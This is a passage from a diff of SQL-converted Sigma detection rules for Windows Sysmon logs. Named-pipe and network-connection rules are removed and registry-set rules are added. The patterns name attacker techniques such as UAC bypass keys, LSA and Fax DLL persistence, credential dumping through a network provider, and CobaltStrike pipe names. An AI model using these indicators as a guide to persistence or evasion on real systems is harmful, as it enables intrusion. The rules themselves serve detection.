'\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "status": "experimental", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use 